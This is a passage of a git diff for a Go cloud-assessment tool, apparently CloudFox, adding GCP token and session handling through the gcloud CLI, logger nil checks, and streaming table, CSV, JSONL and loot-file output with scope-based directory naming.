gcpinternal + +import ( + "context" + "encoding/json" + "fmt" + "os/exec" + "strings" + "sync" + "time" + + "golang.org/x/oauth2" + "golang.org/x/oauth2/google" + "google.golang.org/api/option" +) + +// CommonScopes defines the common OAuth scopes used by GCP services +var CommonScopes = []string{ + "https://www.googleapis.com/auth/cloud-platform", // Full GCP access + "https://www.googleapis.com/auth/cloud-platform.read-only", // Read-only GCP access + "https://www.googleapis.com/auth/compute", // Compute Engine access + "https://www.googleapis.com/auth/devstorage.full_control", // Cloud Storage full access +} + +// SafeSession provides thread-safe GCP authentication with token caching and auto-refresh +type SafeSession struct { + mu sync.Mutex + tokenSource oauth2.TokenSource + currentToken *oauth2.Token + tokens map[string]*oauth2.Token // scope -> token + sessionExpiry time.Time // When the current token expires + monitoring bool // Whether background monitoring is active + stopMonitor chan struct{} // Signal to stop monitoring + refreshBuffer time.Duration // How early to refresh before expiry (default 5 min) + + // Identity info + email string + projectID string + accountType string // "user" or "serviceAccount" +} + +// GCPCredentialInfo holds information about the current credential +type GCPCredentialInfo struct { + Email string `json:"email"` + AccountType string `json:"account_type"` // user, serviceAccount + ProjectID string `json:"project_id"` + Scopes []string +} + +// StaticTokenSource wraps a token for use with GCP clients +type StaticTokenSource struct { + StaticToken *oauth2.Token +} + +// Token returns the static token (implements oauth2.TokenSource) +func (s *StaticTokenSource) Token() (*oauth2.Token, error) { + return s.StaticToken, nil +} + +// NewSafeSession initializes a session using Application Default Credentials +// and prefetches tokens for common scopes +func NewSafeSession(ctx context.Context) (*SafeSession, error) { + // Check if gcloud is authenticated + if !IsSessionValid() { + return nil, fmt.Errorf("GCP session invalid; run 'gcloud auth application-default login' or 'gcloud auth login'") + } + + // Create token source from ADC + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return nil, fmt.Errorf("failed to create token source: %w", err) + } + + ss := &SafeSession{ + tokenSource: ts, + tokens: make(map[string]*oauth2.Token), + refreshBuffer: 5 * time.Minute, + stopMonitor: make(chan struct{}), + } + + // Get initial token and extract expiry + token, err := ts.Token() + if err != nil { + return nil, fmt.Errorf("failed to get initial token: %w", err) + } + ss.currentToken = token + ss.sessionExpiry = token.Expiry + + // Get identity info + info, err := ss.getCurrentIdentity(ctx) + if err == nil { + ss.email = info.Email + ss.accountType = info.AccountType + ss.projectID = info.ProjectID + } + + // Cache the token for the default scope + ss.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return ss, nil +} + +// NewSmartSession creates a session with automatic monitoring and refresh +func NewSmartSession(ctx context.Context) (*SafeSession, error) { + ss, err := NewSafeSession(ctx) + if err != nil { + return nil, err + } + + // Start background monitoring + ss.StartMonitoring(ctx) + + return ss, nil +} + +// ------------------------- TOKEN METHODS ------------------------- + +// GetToken returns a valid access token, refreshing if necessary +func (s *SafeSession) GetToken(ctx context.Context) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + return s.getTokenUnlocked(ctx) +} + +// getTokenUnlocked returns a token without locking (caller must hold lock) +func (s *SafeSession) getTokenUnlocked(ctx context.Context) (string, error) { + // Check if current token is still valid + if s.currentToken != nil && s.currentToken.Valid() { + return s.currentToken.AccessToken, nil + } + + // Refresh the token + token, err := s.tokenSource.Token() + if err != nil { + return "", fmt.Errorf("failed to refresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + return token.AccessToken, nil +} + +// GetTokenForScope returns a token for a specific OAuth scope +func (s *SafeSession) GetTokenForScope(ctx context.Context, scope string) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + + // Check cache first + if tok, ok := s.tokens[scope]; ok && tok.Valid() { + return tok.AccessToken, nil + } + + // Get a new token source for this scope + ts, err := google.DefaultTokenSource(ctx, scope) + if err != nil { + return "", fmt.Errorf("failed to create token source for scope %s: %w", scope, err) + } + + token, err := ts.Token() + if err != nil { + return "", fmt.Errorf("failed to get token for scope %s: %w", scope, err) + } + + // Cache the token + s.tokens[scope] = token + + return token.AccessToken, nil +} + +// GetTokenSource returns the underlying token source for use with GCP clients +func (s *SafeSession) GetTokenSource() oauth2.TokenSource { + return s.tokenSource +} + +// GetClientOption returns a client option for use with GCP API clients +func (s *SafeSession) GetClientOption() option.ClientOption { + return option.WithTokenSource(s.tokenSource) +} + +// GetTokenWithRetry attempts to get a token with automatic retry on failure +func (s *SafeSession) GetTokenWithRetry(ctx context.Context) (string, error) { + token, err := s.GetToken(ctx) + if err != nil { + // Try to refresh session and retry once + if refreshErr := s.RefreshSession(ctx); refreshErr == nil { + token, err = s.GetToken(ctx) + } + } + return token, err +} + +// ------------------------- SESSION MANAGEMENT ------------------------- + +// Ensure validates or refreshes the current session +func (s *SafeSession) Ensure(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + if s.currentToken != nil && s.currentToken.Valid() { + return nil + } + + // Try to get a new token + token, err := s.tokenSource.Token() + if err != nil { + return fmt.Errorf("GCP session invalid or expired: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + return nil +} + +// IsSessionExpired checks if the session has expired or will expire soon +func (s *SafeSession) IsSessionExpired() bool { + s.mu.Lock() + defer s.mu.Unlock() + + if s.sessionExpiry.IsZero() { + return false + } + + // Consider expired if within refresh buffer + return time.Now().Add(s.refreshBuffer).After(s.sessionExpiry) +} + +// RefreshSession refreshes the token and clears the cache +func (s *SafeSession) RefreshSession(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + // Check if gcloud session is still valid + if !IsSessionValid() { + return fmt.Errorf("GCP session expired; please run 'gcloud auth login' or 'gcloud auth application-default login'") + } + + // Create new token source + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return fmt.Errorf("failed to create token source: %w", err) + } + s.tokenSource = ts + + // Get fresh token + token, err := ts.Token() + if err != nil { + return fmt.Errorf("failed to get fresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + // Clear token cache + s.tokens = make(map[string]*oauth2.Token) + s.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return nil +} + +// ------------------------- MONITORING ------------------------- + +// StartMonitoring begins background monitoring of session health +func (s *SafeSession) StartMonitoring(ctx context.Context) { + s.mu.Lock() + if s.monitoring { + s.mu.Unlock() + return + } + s.monitoring = true + s.mu.Unlock() + + go s.monitorSession(ctx) +} + +// StopMonitoring stops the background session monitor +func (s *SafeSession) StopMonitoring() { + s.mu.Lock() + defer s.mu.Unlock() + + if !s.monitoring { + return + } + + s.monitoring = false + close(s.stopMonitor) +} + +// monitorSession runs in background to monitor and refresh session +func (s *SafeSession) monitorSession(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-s.stopMonitor: + return + case <-ctx.Done(): + return + case <-ticker.C: + if s.IsSessionExpired() { + if err := s.RefreshSession(ctx); err != nil { + fmt.Printf("smart session: auto-refresh failed: %v\n", err) + fmt.Println("smart session: please run 'gcloud auth login' to re-authenticate") + } + } + } + } +} + +// ------------------------- IDENTITY INFO ------------------------- + +// GetEmail returns the email of the authenticated identity +func (s *SafeSession) GetEmail() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.email +} + +// GetAccountType returns the type of account (user or serviceAccount) +func (s *SafeSession) GetAccountType() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.accountType +} + +// GetProjectID returns the default project ID +func (s *SafeSession) GetProjectID() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.projectID +} + +// GetSessionExpiry returns when the current token expires +func (s *SafeSession) GetSessionExpiry() time.Time { + s.mu.Lock() + defer s.mu.Unlock() + return s.sessionExpiry +} + +// getCurrentIdentity retrieves identity info from gcloud +func (s *SafeSession) getCurrentIdentity(ctx context.Context) (*GCPCredentialInfo, error) { + // Try gcloud auth list to get current account + out, err := exec.CommandContext(ctx, "gcloud", "auth", "list", "--filter=status:ACTIVE", "--format=json").Output() + if err != nil { + return nil, fmt.Errorf("failed to get gcloud auth list: %w", err) + } + + var accounts []struct { + Account string `json:"account"` + Status string `json:"status"` + } + if err := json.Unmarshal(out, &accounts); err != nil { + return nil, fmt.Errorf("failed to parse gcloud auth list: %w", err) + } + + info := &GCPCredentialInfo{} + if len(accounts) > 0 { + info.Email = accounts[0].Account + // Determine account type from email format + if strings.Contains(info.Email, ".iam.gserviceaccount.com") { + info.AccountType = "serviceAccount" + } else { + info.AccountType = "user" + } + } + + // Get default project + projectOut, err := exec.CommandContext(ctx, "gcloud", "config", "get-value", "project").Output() + if err == nil { + info.ProjectID = strings.TrimSpace(string(projectOut)) + } + + return info, nil +} + +// CurrentUser returns the current identity's email and account type +func (s *SafeSession) CurrentUser(ctx context.Context) (email, accountType string, err error) { + info, err := s.getCurrentIdentity(ctx) + if err != nil { + return "UNKNOWN", "UNKNOWN", err + } + return info.Email, info.AccountType, nil +} + +// ------------------------- HELPER FUNCTIONS ------------------------- + +// IsSessionValid checks if gcloud is authenticated +func IsSessionValid() bool { + // Check if we can get a token via gcloud + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return false + } + + token := strings.TrimSpace(string(out)) + return token != "" && !strings.Contains(token, "ERROR") +} + +// IsADCConfigured checks if Application Default Credentials are configured +func IsADCConfigured() bool { + ctx := context.Background() + _, err := google.DefaultTokenSource(ctx, "https://www.googleapis.com/auth/cloud-platform") + return err == nil +} + +// GetDefaultProject returns the default GCP project from gcloud config +func GetDefaultProject() string { + out, err := exec.Command("gcloud", "config", "get-value", "project").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetDefaultAccount returns the default account from gcloud config +func GetDefaultAccount() string { + out, err := exec.Command("gcloud", "config", "get-value", "account").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetAccessToken returns a fresh access token from gcloud CLI +// This is useful for REST API calls that need a bearer token +func GetAccessToken() (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return "", fmt.Errorf("failed to get access token: %w", err) + } + return strings.TrimSpace(string(out)), nil +} + +// GetAccessTokenForAccount returns an access token for a specific account +func GetAccessTokenForAccount(account string) (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token", "--account", account).Output() + if err != nil { + return "", fmt.Errorf("failed to get access token for account %s: %w", account, err) + } + return strings.TrimSpace(string(out)), nil +} diff --git a/internal/log.go b/internal/log.go index 9b89fe4e..007ff275 100644 --- a/internal/log.go +++ b/internal/log.go @@ -72,7 +72,9 @@ func (l *Logger) Error(text string) { func (l *Logger) ErrorM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) - l.txtLog.Printf("[%s] %s", module, text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } } func (l *Logger) Fatal(text string) { @@ -81,7 +83,9 @@ func (l *Logger) Fatal(text string) { func (l *Logger) FatalM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - l.txtLog.Printf("[%s] %s", module, text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) os.Exit(1) } diff --git a/internal/output2.go b/internal/output2.go index 1cce6b57..3b1929b1 100644 --- a/internal/output2.go +++ b/internal/output2.go @@ -1,6 +1,7 @@ package internal import ( + "bufio" "encoding/csv" "encoding/json" "fmt" @@ -9,6 +10,7 @@ import ( "path/filepath" "regexp" "strings" + "sync" "github.com/aquasecurity/table" "github.com/fatih/color" @@ -23,6 +25,9 @@ var fileSystem = afero.NewOsFs() // Color functions var cyan = color.New(color.FgCyan).SprintFunc() +// global lock to prevent concurrent write races +var lootFileMu sync.Mutex + type OutputClient struct { Verbosity int CallingModule string @@ -59,6 +64,20 @@ type LootFile struct { Contents string } +// TableCol represents a column definition for table output +type TableCol struct { + Name string + Width int +} + +// TableFiles represents table output configuration +type TableFiles struct { + Directory string + TableCols []TableCol + ResultsFile string + LootFile string +} + // TODO support datastructures that enable brief or wide format type CloudfoxOutput interface { TableFiles() []TableFile @@ -102,6 +121,425 @@ func HandleOutput( return nil } +// HandleStreamingOutput writes table and loot files incrementally, then finalizes tables at the end. +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func HandleStreamingOutput( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(dataToOutput.TableFiles()) > 0 { + baseCloudfoxModule = dataToOutput.TableFiles()[0].Name + } + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + if err := os.MkdirAll(outDirectoryPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // ---- STREAM ROWS TO TEMP FILES ---- + for _, t := range dataToOutput.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + tmpTablePath := filepath.Join(outDirectoryPath, safeName+".tmp") + if err := os.MkdirAll(filepath.Dir(tmpTablePath), 0o755); err != nil { + return fmt.Errorf("failed to create parent directory for temp table: %w", err) + } + + tmpTableFile, err := os.OpenFile(tmpTablePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open temporary table file: %w", err) + } + defer tmpTableFile.Close() + + // Append each row into the tmp file + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + if _, err := tmpTableFile.WriteString(strings.Join(cleanRow, ",") + "\n"); err != nil { + return fmt.Errorf("failed to append row to tmp table: %w", err) + } + } + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outDirectoryPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + defer csvFile.Close() + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outDirectoryPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + } + } + + // ---- STREAM LOOT ---- + for _, l := range dataToOutput.LootFiles() { + lootDir := filepath.Join(outDirectoryPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer lootFile.Close() + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := lootFile.WriteString(scanner.Text() + "\n"); err != nil { + return fmt.Errorf("failed to append loot line: %w", err) + } + } + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + } + + // ---- FINALIZE TABLES MEMORY-SAFE ---- + if err := StreamFinalizeTables(cloudProvider, format, outputDirectory, verbosity, wrap, scopeType, scopeIdentifiers, scopeNames, principal, nil); err != nil { + return fmt.Errorf("failed to finalize tables: %w", err) + } + + // Log individual output files like the non-streaming output does + for _, t := range dataToOutput.TableFiles() { + safeName := sanitizeFileName(t.Name) + if format == "all" || format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "table", safeName+".txt")), baseCloudfoxModule) + } + if format == "all" || format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if format == "all" || format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + } + for _, l := range dataToOutput.LootFiles() { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "loot", l.Name+".txt")), baseCloudfoxModule) + } + + return nil +} + +// StreamFinalizeTables writes final tables line-by-line to avoid memory issues. +// It reads each .tmp file and writes it directly to a tab-delimited .txt table. +// Note: does not print a pretty table +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func StreamFinalizeTables( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + header []string, +) error { + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + // Ensure final table directory exists + tableDir := filepath.Join(outDirectoryPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + + // Walk the output directory looking for .tmp files + err := filepath.Walk(outDirectoryPath, func(tmpPath string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if info.IsDir() || !strings.HasSuffix(info.Name(), ".tmp") { + return nil + } + + // Derive final table file name + baseName := strings.TrimSuffix(info.Name(), ".tmp") + tablePath := filepath.Join(tableDir, baseName+".txt") + + // Open output .txt for writing + outFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open final table file %s: %w", tablePath, err) + } + defer outFile.Close() + + // Write header row + if len(header) > 0 { + _, _ = fmt.Fprintln(outFile, strings.Join(header, "\t")) + } + + // Stream each row from .tmp file line-by-line + tmpFile, err := os.Open(tmpPath) + if err != nil { + return fmt.Errorf("failed to open tmp file %s: %w", tmpPath, err) + } + defer tmpFile.Close() + + scanner := bufio.NewScanner(tmpFile) + for scanner.Scan() { + line := scanner.Text() + cols := strings.Split(line, ",") + // Remove any ANSI color codes + cols = removeColorCodesFromSlice(cols) + _, _ = fmt.Fprintln(outFile, strings.Join(cols, "\t")) + } + if scanErr := scanner.Err(); scanErr != nil { + return fmt.Errorf("error scanning tmp file %s: %w", tmpPath, scanErr) + } + + // Delete the temporary .tmp file after streaming + _ = os.Remove(tmpPath) + + return nil + }) + + return err +} + +// streamRenderTableWithHeader renders a tmp file into a table with a single header row. +func streamRenderTableWithHeader(tmpFilePath string, header []string, outFile *os.File, wrap bool) error { + t := table.New(outFile) + if !wrap { + t.SetColumnMaxWidth(1000) + } + + if len(header) > 0 { + t.SetHeaders(header...) + } + + t.SetRowLines(false) + t.SetDividers(table.UnicodeRoundedDividers) + t.SetAlignment(table.AlignLeft) + t.SetHeaderStyle(table.StyleBold) + + // Stream rows from tmp file + f, err := os.Open(tmpFilePath) + if err != nil { + return err + } + defer f.Close() + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := scanner.Text() + row := strings.Split(line, ",") + t.AddRow(row...) + } + if err := scanner.Err(); err != nil { + return err + } + + t.Render() + return nil +} + +func AppendCSV(outputDir string, table TableFile) error { + csvDir := filepath.Join(outputDir, "csv") + if err := os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(csvDir, table.Name+".csv") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + writer := csv.NewWriter(f) + // Only write header if file is new + info, err := f.Stat() + if err != nil { + return err + } + if info.Size() == 0 { + if err := writer.Write(table.Header); err != nil { + return err + } + } + + for _, row := range table.Body { + row = removeColorCodesFromSlice(row) + if err := writer.Write(row); err != nil { + return err + } + } + writer.Flush() + return writer.Error() +} + +func AppendLoot(outputDir string, loot LootFile) error { + lootDir := filepath.Join(outputDir, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(lootDir, loot.Name+".txt") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + if _, err := f.WriteString(loot.Contents + "\n"); err != nil { + return err + } + return nil +} + +func AppendJSON(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".json") + var existing []map[string]string + + // Try to load existing JSON if file exists + if _, err := os.Stat(filePath); err == nil { + data, err := os.ReadFile(filePath) + if err != nil { + return err + } + if len(data) > 0 { + if err := json.Unmarshal(data, &existing); err != nil { + return err + } + } + } + + // Append new rows + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + existing = append(existing, rowMap) + } + + jsonBytes, err := json.MarshalIndent(existing, "", " ") + if err != nil { + return err + } + + return os.WriteFile(filePath, jsonBytes, 0644) +} + +func AppendJSONL(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".jsonl") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + jsonBytes, _ := json.Marshal(rowMap) + if _, err := f.Write(append(jsonBytes, '\n')); err != nil { + return err + } + } + + return nil +} + +func AppendLootFile(outputDirectory, lootFileName, entry string) error { + // Ensure output directory exists + lootDir := filepath.Join(outputDirectory, "loot") + if err := os.MkdirAll(lootDir, 0755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + // Loot file path + lootPath := filepath.Join(lootDir, fmt.Sprintf("%s.txt", lootFileName)) + + // Lock so concurrent workers don't clobber each other + lootFileMu.Lock() + defer lootFileMu.Unlock() + + // Open in append mode + f, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer f.Close() + + // Write entry with newline + if _, err := f.WriteString(entry + "\n"); err != nil { + return fmt.Errorf("failed to write to loot file: %w", err) + } + + return nil +} + func removeColorCodes(input string) string { // Regular expression to match ANSI color codes ansiRegExp := regexp.MustCompile(`\x1b\[[0-9;]*m`) @@ -425,28 +863,6 @@ func (b *TableClient) createJSONFiles() { } } -// func (b *TableClient) writeJSONFiles() []string { -// var fullFilePaths []string - -// for _, file := range b.TableFiles { -// file.Body = removeColorCodesFromNestedSlice(file.Body) -// jsonBytes, err := json.Marshal(file.Body) -// if err != nil { -// log.Fatalf("error marshalling json: %s", err) -// } - -// _, err = file.JSONFilePointer.Write(jsonBytes) -// if err != nil { -// log.Fatalf("error writing json: %s", err) -// } - -// fullPath := path.Join(b.DirectoryName, "json", fmt.Sprintf("%s.json", file.Name)) -// fullFilePaths = append(fullFilePaths, fullPath) -// } - -// return fullFilePaths -// } - func (b *TableClient) writeJSONFiles() []string { var fullFilePaths []string @@ -518,3 +934,264 @@ func WriteJsonlFile(file *os.File, data interface{}) error { } return nil } + +func sanitizeFileName(name string) string { + // replace / and \ with _ + re := regexp.MustCompile(`[\\/]+`) + return re.ReplaceAllString(name, "_") +} + +// ============================================================================ +// NEW OUTPUT FUNCTIONS V2 - Multi-cloud support with intelligent routing +// ============================================================================ + +// HandleOutputV2 is the new generic output function that supports multi-cloud +// environments (Azure, AWS, GCP) with proper scope handling. +// This function provides a cleaner directory structure based on scope type. +// +// Directory structure: +// - Azure (tenant mode): cloudfox-output/Azure/{UPN}/{TenantName}/module.csv +// - Azure (subscription mode): cloudfox-output/Azure/{UPN}/{SubscriptionName}/module.csv +// - AWS (org mode): cloudfox-output/AWS/{Principal}/{OrgID}/module.csv +// - AWS (account mode): cloudfox-output/AWS/{Principal}/{AccountName}/module.csv +// - GCP (org mode): cloudfox-output/GCP/{Principal}/{OrgID}/module.csv +// - GCP (project mode): cloudfox-output/GCP/{Principal}/{ProjectName}/module.csv +func HandleOutputV2( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, // "tenant", "subscription", "organization", "account", "project" + scopeIdentifiers []string, // Tenant IDs, Subscription IDs, Account IDs, Project IDs + scopeNames []string, // Friendly names for scopes + principal string, // UPN or IAM user + dataToOutput CloudfoxOutput, +) error { + // Build the results identifier based on scope + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build output directory path with new structure + // Format: cloudfox-output/{CloudProvider}/{Principal}/{ResultsIdentifier}/ + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + tables := dataToOutput.TableFiles() + lootFiles := dataToOutput.LootFiles() + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outDirectoryPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outDirectoryPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// HandleOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for all modules to use. +// +// Decision thresholds: +// - < 50,000 rows: Uses HandleOutputV2 (normal in-memory) +// - >= 50,000 rows: Uses HandleStreamingOutput (memory-efficient streaming) +// - >= 500,000 rows: Logs warning about large dataset +// - >= 1,000,000 rows: Logs critical warning, suggests optimization flags +func HandleOutputSmart( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Count total rows across all table files + totalRows := 0 + for _, tableFile := range dataToOutput.TableFiles() { + totalRows += len(tableFile.Body) + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Consider using per-scope flags for better performance.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("WARNING: Large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + + // Use streaming output for large datasets (new signature) + return HandleStreamingOutput( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) + } + + // Use normal in-memory output for smaller datasets + return HandleOutputV2( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) +} + +// buildResultsIdentifier creates a results identifier from scope information. +// It prefers friendly names over IDs for better readability. +// +// Fallback hierarchy: +// - Azure: Tenant Name → Tenant GUID → Subscription Name → Subscription GUID +// - AWS: Org Name → Org ID → Account Alias → Account ID +// - GCP: Org Name → Org ID → Project Name → Project ID +// +// Directory Naming Convention: +// - Tenant-level: [T]{TenantName} or [T]{TenantGUID} +// - Subscription-level: [S]{SubscriptionName} or [S]{SubscriptionGUID} +// - Organization-level: [O]-{OrgName} or [O]-{OrgID} +// - Account-level: [A]-{AccountName} or [A]-{AccountID} +// - Project-level: [P]-{ProjectName} or [P]-{ProjectID} +func buildResultsIdentifier(scopeType string, identifiers, names []string) string { + var rawName string + + // Prefer friendly name if available + if len(names) > 0 && names[0] != "" { + rawName = names[0] + } else if len(identifiers) > 0 && identifiers[0] != "" { + // Fallback to identifier + rawName = identifiers[0] + } else { + // Ultimate fallback + rawName = "unknown-scope" + } + + // Sanitize the name for Windows/Linux compatibility + sanitizedName := sanitizeDirectoryName(rawName) + + // Add scope prefix based on scope type + prefix := getScopePrefix(scopeType) + if prefix != "" { + return prefix + sanitizedName + } + + return sanitizedName +} + +// getScopePrefix returns the appropriate prefix for a given scope type +func getScopePrefix(scopeType string) string { + switch scopeType { + case "tenant": + return "[T]" + case "subscription": + return "[S]" + case "organization": + return "[O]" + case "account": + return "[A]" + case "project": + return "[P]" + default: + return "" + } +} + +// sanitizeDirectoryName removes or replaces characters that are invalid in Windows/Linux directory names +// Invalid characters: < > : " / \ | ? * +// Also trims leading/trailing spaces and dots (Windows restriction) +func sanitizeDirectoryName(name string) string { + // Replace invalid characters with underscore + invalidChars := []string{"<", ">", ":", "\"", "/", "\\", "|", "?", "*"} + sanitized := name + for _, char := range invalidChars { + sanitized = strings.ReplaceAll(sanitized, char, "_") + } + + // Trim leading/trailing spaces and dots 